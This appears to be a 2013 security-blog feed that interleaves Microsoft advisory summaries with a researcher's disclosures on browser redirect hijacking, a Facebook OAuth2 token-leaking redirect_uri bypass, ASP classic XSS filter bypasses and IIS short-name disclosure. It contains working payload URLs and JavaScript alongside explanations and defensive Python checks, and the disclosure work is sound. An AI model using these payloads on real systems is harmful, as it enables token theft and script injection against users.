Microsoft Security Advisory (2819682): Security Updates for Microsoft Windows Store Applications – Version: 1.0

Revision Note: V1.0 (March 26, 2013): Announced availability of update 2832006 for Windows Modern Mail.
Summary: Microsoft is announcing the availability of security updates for Windows Store applications running on Windows 8, Windows RT, and Windows Server 2012 (Windows Server 2012 Server Core installations are not affected). The updates address vulnerabilities that are detailed in the Knowledge Base articles associated with each update.

IE/Firefox Redirection Issue – FB Oauth2 Bypass – BugCrowd

To keep a record of the little things I have done since my last blog post:

1- IE/Firefox – Page Redirection Hijack

Several weeks ago, I published an interesting PoC via my Twitter account: a web page that stops Firefox and IE from redirecting users to their intended destination, even when they have typed it directly into the address bar: https://twitter.com/irsdl/status/294239415428067329

This issue is still unpatched in the latest versions of these browsers (March 2013). Unfortunately, some advertising companies are already exploiting it as well. I have reported it to Mozilla: https://bugzilla.mozilla.org/show_bug.cgi?id=839470

Example 1: No Redirection Ever: http://0me.me/demo/mozilla/firefox/UnRedirectablePage.html

Here is the JavaScript code that does this:

window.onbeforeunload = function () {
      // Unredirectable page: as soon as the browser starts to leave, schedule a
      // navigation back to the current URL and stall the unload with an alert.
      setTimeout("window.location=document.location;alert('delay by alert');", 0);
};

Example 2: This always redirects you to secproject.com: http://0me.me/demo/mozilla/firefox/RedirectToSecProject.html

Here is the JavaScript code that does this:

window.onbeforeunload = function () {
      // Same trick, but the scheduled navigation goes to a fixed URL instead
      // of the current page, so every attempt to leave ends up at secproject.com.
      setTimeout("window.location='http://www.secproject.com';alert('delay by alert');", 0);
};

2- Facebook OAuth2 Bypass

Facebook OAuth2: yet another redirection bypass! I only found one issue, which was very similar to what Nir Goldshlager (www.nirgoldshlager.com) and Egor Homakov (homakov.blogspot.co.uk) had reported to Facebook. I highly recommend reading their blog posts about Facebook OAuth2!

Here is what I found in Facebook:

The following URL could send your session to the attacker’s domain, and he could hijack your OAuth token:

https://www.facebook.com/dialog/oauth?client_id=210831918949520&response_type=token&scope=,,,,&redirect_uri=https://apps.facebook.com/candycrush1//////////%23/testrdirsdl/%2523

It used to work in all browsers. However, you needed to find an authorised Facebook app in order to exploit this issue.

A short description:

- “/////” in the URL -> to bypass an IE problem with Facebook redirection.

- “candycrush1” -> to redirect the user to a normal user page instead of the Candy Crush game! “https://apps.facebook.com/candy.crush1” takes you to a user page instead of an app!

- “%2523” and “%23” -> to remove the “#” from the final URL so that the token is sent directly in the URL.

The result of loading that URL was:

http://apps.facebook.com/testrdirsdl/&access_token=BlahBlahBlah&expires_in=5033

in which “testrdirsdl” is my app, which can store the tokens in “http://www.secproject.com/demo/showmyinfo.php” (it does not have logging functionality at the moment!).
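To make the redirect_uri side of this concrete, here is an added Python example (my illustration, not Facebook’s code and not part of the original post). It contrasts a deliberately lenient redirect_uri check, which percent-decodes the value and accepts any path under the app’s registered prefix, with the exact-match check that RFC 6749 recommends, and it shows how the “%23”/“%2523” in the URL above only turn into a real “#” after one or two rounds of decoding. The registered URI “https://apps.facebook.com/candycrush1/” is an assumption made for the demonstration.

```python
from urllib.parse import unquote, urlsplit

# Assumed registration for the demo: the only place this app may receive tokens.
REGISTERED_REDIRECT_URIS = {"https://apps.facebook.com/candycrush1/"}

# The redirect_uri parameter from the dialog URL in this post, as sent on the wire.
POST_REDIRECT_URI = "https://apps.facebook.com/candycrush1//////////%23/testrdirsdl/%2523"


def lenient_redirect_uri_ok(requested, registered=REGISTERED_REDIRECT_URIS):
    """A permissive check of the kind that lets path tricks through: percent-decode
    first, then accept any URI on a registered scheme+host whose path starts with
    a registered path. Illustrative only; this is not Facebook's real logic."""
    req = urlsplit(unquote(requested))
    for allowed in registered:
        reg = urlsplit(allowed)
        if (req.scheme, req.netloc) == (reg.scheme, reg.netloc) and req.path.startswith(reg.path):
            return True
    return False


def strict_redirect_uri_ok(requested, registered=REGISTERED_REDIRECT_URIS):
    """Exact string match against the registered set: no decoding, no prefix logic,
    and the registered URIs themselves carry no fragment (RFC 6749 section 3.1.2)."""
    return requested in registered and all("#" not in r for r in registered)


def fragment_by_decode_depth(uri, rounds=2):
    """Fragment a URL parser sees after 0, 1, ..., `rounds` rounds of unquote()."""
    seen = []
    for _ in range(rounds + 1):
        seen.append(urlsplit(uri).fragment)
        uri = unquote(uri)
    return seen


if __name__ == "__main__":
    print("lenient:", lenient_redirect_uri_ok(POST_REDIRECT_URI))   # True
    print("strict: ", strict_redirect_uri_ok(POST_REDIRECT_URI))    # False
    print("fragments by decode depth:", fragment_by_decode_depth(POST_REDIRECT_URI))
```

The third function is the point the post makes with “%2523”: every component that decodes the URL again (the authorization server, an app page that routes on the fragment, the browser) sees the fragment boundary in a different place, so a redirect_uri check has to compare the raw string against the registered one and never re-decode it.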

3- BugCrowd!

I attended several BugCrowd.com bounties and gladly received $$$ for private and public bounties! I liked the charity ones as well :)

If you want to test live and different websites without legal obligations (well, I hope they can provide us with a signed document per project very soon!), it is the right place. I recommend it to people who want to have fun and improve their web application security testing skills.

Unfortunately, the recent bounties from BugCrowd did not have fair prizes, and I guess that is because of the companies’ budgets. Moreover, we still need them to come up with the hall of fame table! As soon as they sort these out, I will become more interested!

That’s it for now. Thanks for your time.

Browsers Anti-XSS methods in ASP (classic) have been defeated!

Download Link: http://soroush.secproject.com/downloadable/Browsers_Anti-XSS_methods_in_ASP_(classic)_have_been_defeated.pdf

This time, I want to start with the summary section first to break the rules!

Summary

The intention of this paper is to show that client-side XSS protection methods must have rules for different web application languages; otherwise they will be bypassed. This research is based on ASP classic web applications, but the same approach can be applied to other web application languages as well.

Introduction

I researched different methods of sending inputs to an ASP (classic) page. I found that almost none of the browsers’ Anti-XSS protection methods are aware of the different ways in which ASP accepts inputs; therefore, all of them can be bypassed.

Note: NoScript has already added all of these rules and is currently more secure than the others (thanks to Giorgio Maone for patching it as quickly as possible). IE9 understands ASP better than Google Chrome does, but it still does not have all the rules.

Description

In order to make you more interested, I will start with two examples:

Example 1: Do you think Anti-XSS methods should detect this easy XSS attack?


http://www.sdl.me/xssdemo/getxss.asp?input1=<script/&&input1=FOOBAR&input1=>alert('@IRSDL');</script>

Please try it in IE8/9/10 and Google Chrome to see the result.

Example 2: What about this?


http://www.sdl.me/xssdemo/getxss.asp?input1=<script/&in%u2119ut1=>al%u0117rt('@IRSDL')</script/

Example 3: Or, sometimes, the bypass can be complicated! This is how I solved my XSS1 and XSS2 questions with a single solution in SecProject.com Challenge Series 1:


http://sdl.me/challenge1/xss1/JsChallenge1.asp?I%%NPUT2=Somet%%hing&iN%%PUT2=')1&inP%%UT2%00%00=1};lt=1;1&In%u2119ut2=1%26<1&input2=0<ale%%rt(/AWESOME_IRSDL/&in%u2119U%%T2%00%00%0%%0%00%0%%0=1);1&in%u2119uT%%2%00=1;i%%f(0&in%u2119ut2%%=1){{1&I%%n%%PuT2%00%00%00=1/%%*%%/&iN%%p%%Ut2=1/%%/

And

http://sdl.me/challenge1/xss2/JsChallenge2.asp?I%%NPUT1=Somet%%hing&iN%%PUT1=')1&inP%%UT1%00%00=1};lt=1;1&In%u2119ut1=1%26<1&input1=0<ale%%rt(/AWESOME_IRSDL/&in%u2119U%%T1%00%00%0%%0%00%0%%0=1);1&in%u2119uT%%1%00=1;i%%f(0&in%u2119ut1%%=1){{1&I%%n%%PuT1%00%00%00=1/%%*%%/&iN%%p%%Ut1=1/%%/

As you can see, I am using only one input parameter to bypass everything! (Note: this special page in xss1 converts “<” and “>” to “&lt;” and “&gt;”, which was used to bypass NoScript as well – it is not a NoScript bug.)

Why can you bypass these XSS protections? I will tell you now.

Interesting ASP Input Features

1- HTTP Parameter Pollution (HPP): ASP is one of the web application languages that can receive several inputs with one single name. Although this feature was/is used legitimately in some web applications, it can also be useful for attackers to bypass some restrictions [1].

2- Certain %u-encoded Unicode characters will be transformed to their closest ASCII equivalents [2], [3]. This applies to both parameter names and their values. Therefore, “inPut1=<scriPt>” is equal to “%u0131n%u2119ut1=%u3008scr%u0131%u2119t>”.

3- Parameter names in ASP are not case sensitive. Therefore, “input1” is equal to “InPuT1”.

4- Anything after a null character is ignored in parameter names and their values. Therefore, “input1=test” is equal to “input1%00Something=test%00Anything”.

5- Percent characters (“%”) are ignored when no hex value follows them, in parameter names and their values. Therefore, “input1=test” is equal to “%input1%=t%%est%”.

6- When a parameter name after an ampersand (“&”) is not followed by an equals sign (“=”), ASP does not count it as a separate input. As a result, in “?&input1=test” the parameter name is “&input1”; and in “?&input1&input1=test” the parameter name is “&input1&input1”.

Bypassing browsers Anti-XSS protections

Now we know many different interesting features of ASP. We can mix these features together to bypass the browsers protections which do not understand these rules. Please see the above examples again to identify the feature types which have been used.

Note 1: URL encoding can be used in ASP to obfuscate the attack.

Note 2: Many %u-encoded characters, such as “%u1111”, will be translated to “?” in ASP, which can be used in JavaScript.

Note 3: Normally, a %u-encoded string should have a lowercase “u”. Therefore, “%u0041” (which is “A”) is not equal to “%U0041” (which stays “U0041”). However, server configurations can sometimes make these equal!

Note 4: If you have more than one input (multi-injection), reordering the input parameters may bypass the protections (input disorder method [4]).
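The six features and Notes 2 and 3 above can be written down as a small parser. The following Python script is an added example, not code from this paper or from Microsoft: it emulates how ASP classic’s Request.QueryString reads a query string under those rules (repeated names joined with “, ”, %u-encoded characters best-fit to ASCII, case-insensitive names, null truncation, stray “%” ignored, and “&name” without “=” glued onto the next parameter name). The best-fit table only covers the code points shown in this paper; other characters fall back to NFKD decomposition or “?”, which is an approximation of the real Windows best-fit mapping, and the handling of a trailing segment without “=” is an assumption the paper does not cover. Feeding it Examples 1 to 3 shows the single input1/input2 value the server actually builds.

```python
import unicodedata

# %uXXXX code points shown in the paper and the ASCII they best-fit to.
# Real ASP/IIS uses the Windows best-fit tables; anything not listed here is
# approximated with NFKD decomposition, otherwise "?" (Note 2).
BEST_FIT = {0x0131: "i", 0x2119: "P", 0x0117: "e", 0x3008: "<"}
HEX = set("0123456789abcdefABCDEF")


def best_fit(ch):
    """Approximate ASP's conversion of a non-ASCII character to ASCII."""
    cp = ord(ch)
    if cp < 0x80:
        return ch
    if cp in BEST_FIT:
        return BEST_FIT[cp]
    base = unicodedata.normalize("NFKD", ch)
    return base[0] if ord(base[0]) < 0x80 else "?"


def asp_decode(raw):
    """Decode one parameter name or value the way the paper describes ASP doing it."""
    out = []
    i = 0
    while i < len(raw):
        c = raw[i]
        if c == "+":
            out.append(" ")
            i += 1
        elif c == "%":
            rest = raw[i + 1:i + 6]
            if rest[:1] == "u" and len(rest) == 5 and set(rest[1:]) <= HEX:
                # lowercase "u" only (Note 3): %u2119 -> P, but %U0041 stays "U0041"
                out.append(best_fit(chr(int(rest[1:], 16))))
                i += 6
            elif len(rest) >= 2 and set(rest[:2]) <= HEX:
                out.append(chr(int(rest[:2], 16)))   # %XX -> single byte
                i += 3
            else:
                i += 1                               # stray "%" is ignored (feature 5)
        else:
            out.append(c)
            i += 1
    return "".join(out).split("\x00", 1)[0]          # null truncates (feature 4)


def parse_asp_query(query):
    """Return {lowercased name: [values]} following the paper's ASP rules."""
    params = {}
    pending = []   # "&name" with no "=" is glued onto the next name (feature 6)
    for seg in query.split("&"):
        if "=" not in seg:
            pending.append(seg)
            continue
        name, value = seg.split("=", 1)
        name = asp_decode("&".join(pending + [name])).lower()   # case-insensitive (feature 3)
        pending = []
        params.setdefault(name, []).append(asp_decode(value))
    if pending:
        # Trailing segment(s) without "=": not covered by the paper; assumed here
        # to become a name with an empty value.
        params.setdefault(asp_decode("&".join(pending)).lower(), []).append("")
    return params


def request_querystring(query, name):
    """Emulate Request.QueryString(name): repeated names are joined with ', ' (feature 1, HPP)."""
    return ", ".join(parse_asp_query(query).get(name.lower(), []))


if __name__ == "__main__":
    examples = {
        "Example 1": "input1=<script/&&input1=FOOBAR&input1=>alert('@IRSDL');</script>",
        "Example 2": "input1=<script/&in%u2119ut1=>al%u0117rt('@IRSDL')</script/",
        "Feature 2": "%u0131n%u2119ut1=%u3008scr%u0131%u2119t>",
    }
    for label, q in examples.items():
        print(f"{label}: input1 = {request_querystring(q, 'input1')!r}")
```

A browser-side XSS filter looks at the raw URL and sees three unrelated fragments; the server sees one string such as “<script/, >alert('@IRSDL');</script>”, which is why a filter needs the same normalisation rules as the server it is protecting.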

Finally

Please let me know via twitter or email if you know or have found any other interesting features.

This research was based on classic ASP. However, other languages such as PHP can be studied in the same way; for example, PHP ignores leading spaces in parameter names and anything after “[]” or a null character (“%00”) in parameter names, and it converts space, dot, and a lone opening square bracket (“ .[”) in parameter names to an underscore (“_”).

References

[1] HTTP Parameter Pollution, URL: https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf

[2] NoScript New Bypass Method by Unicode in ASP, URL: http://soroush.secproject.com/blog/2010/08/noscript-new-bypass-method-by-unicode-in-asp/

[3] Lost in Translation (ASP’s HomoXSSuality), URL: http://hackademix.net/2010/08/17/lost-in-translation-asps-homoxssuality/

[4] SecProject Web AppSec Challenge Series 1 Results, URL: http://soroush.secproject.com/blog/2012/06/challenge-series-1-result-and-conclusion/

 


Microsoft Security Advisory (973811): Extended Protection for Authentication – Version: 1.14

Revision Note: V1.14 (January 8, 2013): Updated the FAQ and Suggested Actions with details about attacks against NTLMv1 (NT LAN Manager version 1) and LAN Manager (LM) network authentication. Microsoft Fix it options for Windows XP and Windows Server 2003 are available to help protect against these attacks. Applying these Microsoft Fix it options enables NTLMv2 settings required for users to take advantage of Extended Protection for Authentication.
Summary: Microsoft is announcing the availability of a new feature, Extended Protection for Authentication, on the Windows platform. This feature enhances the protection and handling of credentials when authenticating network connections using Integrated Windows Authentication (IWA).

Microsoft Security Advisory (2794220): Vulnerability in Internet Explorer Could Allow Remote Code Execution – Version: 2.0

Revision Note: V2.0 (January 14, 2013): Advisory updated to reflect publication of security bulletin.
Summary: Microsoft has completed the investigation into a public report of this vulnerability. We have issued MS13-008 to address this issue. For more information about this issue, including download links for an available security update, please review MS13-008. The vulnerability addressed is the Internet Explorer Use After Free Vulnerability – CVE-2012-4792.

Microsoft Security Advisory (2798897): Fraudulent Digital Certificates Could Allow Spoofing – Version: 1.1

Revision Note: V1.1 (January 14, 2013): Corrected the disallowed certificate list effective date to “Monday, December 31, 2012 (or later)” in the FAQ entry, “After applying the update, how can I verify the certificates in the Microsoft Untrusted Certificates Store?”
Summary: Microsoft is aware of active attacks using one fraudulent digital certificate issued by TURKTRUST Inc., which is a CA present in the Trusted Root Certification Authorities Store. This fraudulent certificate could be used to spoof content, perform phishing attacks, or perform man-in-the-middle attacks. This issue affects all supported releases of Microsoft Windows.

Microsoft IIS tilde character “~” Vulnerability/Feature – Short File/Folder Name Disclosure

Two security issues have been reported via this security research:

1- IIS Short File/Folder Name Disclosure by using the tilde (“~”) character

2- .Net Framework Tilde Character DoS

Workaround and Prevention:

We are working with security vendors to come up with a solution to mitigate the risk of these vulnerabilities. The paper PDF file will be updated accordingly.

IIS Shortname Scanner PoC – Source Code: http://code.google.com/p/iis-shortname-scanner-poc/

Download Link: http://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf

Microsoft Security Advisory (2757760): Vulnerability in Internet Explorer Could Allow Remote Code Execution – Version: 2.0

Revision Note: V2.0 (September 21, 2012): Advisory updated to reflect publication of security bulletin.
Summary: Microsoft has completed the investigation into public reports of this vulnerability. We have issued MS12-063 to address this issue. For more information about this issue, including download links for an available security update, please review MS12-063. The vulnerability addressed is the execCommand Use After Free Vulnerability – CVE-2012-4969.

Microsoft Security Advisory (2737111): Vulnerabilities in Microsoft Exchange and FAST Search Server 2010 for SharePoint Parsing Could Allow Remote Code Execution – Version: 3.0

Revision Note: V3.0 (October 9, 2012): Advisory updated to reflect publication of security bulletin for Microsoft FAST Search Server 2010 for SharePoint.
Summary: Microsoft has completed the investigation into public reports of vulnerabilities in third-party code, Oracle Outside In libraries, that affect Microsoft Exchange Server 2007, Microsoft Exchange Server 2010, and FAST Search Server 2010 for SharePoint, which ship that component.